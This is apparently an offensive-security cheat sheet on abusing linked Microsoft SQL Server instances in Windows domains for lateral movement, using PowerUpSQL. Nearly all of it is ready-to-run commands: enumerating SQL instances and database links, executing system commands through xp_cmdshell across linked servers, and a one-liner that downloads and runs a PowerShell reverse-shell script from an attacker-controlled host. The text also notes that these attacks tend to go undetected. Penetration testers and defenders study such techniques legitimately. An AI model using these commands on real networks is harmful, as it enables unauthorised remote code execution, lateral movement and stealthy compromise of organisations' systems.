MSSQL Server Trust Abuse

Within Windows domains, plenty of servers deploy MSSQL, often on their own servers with users from other servers often connect to. If a domain has a SQL Server, it provides an excellent opportunity for lateral movement in a domain as domain users can be mapped to database roles.

What we can also take advantage are database links. Often, SQL Servers within a network are accessible to each other and the links between the different databases provide a unique way for us to traverse within the Active Directory network by indirectly being able to execute commands without leaving our current station. It works not only between domain trusts in a forest, but between separate forests as well.

These attacks can also go relatively undetected because of the fact you can execute commands on distant SQL Servers from your own machine.

Enumeration

We can use PowerUPSQL.ps1 to use to enumerate SQL Servers.

Finding Instances From SQL Servers That Have an SPN with the Domain Controller and Discovering Logon Sessions

Get-SQLInstanceDomain

Finding Accessible SQL Servers

Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

Retrieve Basic Server and Information From Target SQL Servers For Each Instance

Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

Searching Database Links

Get-SQLServerLink -Instance <sql_server_domain> -Verbose

# Crawling downfield database links from a SQL Server you can access
Get-SQLServerLinkCrawl -Instance <sql_server_domain> -Verbose

Now We Can Execute Commands

Check the results next to the 'CustomQuery' header

Get-SQLServerLinkCrawl -Instance <sql_server_instance> -Query "exec master..xp_cmdshell 'whoami'"

Get a Reverse Shell

Get-SQLServerLinkCrawl -Instance <sql_server_instance> -Query "exec master..xp_cmdshell 'powershell.exe iex(New-Object Net.WebClient).downloadString(''http://<ip:port>/Invoke-PowerShellTcp.ps1'')'"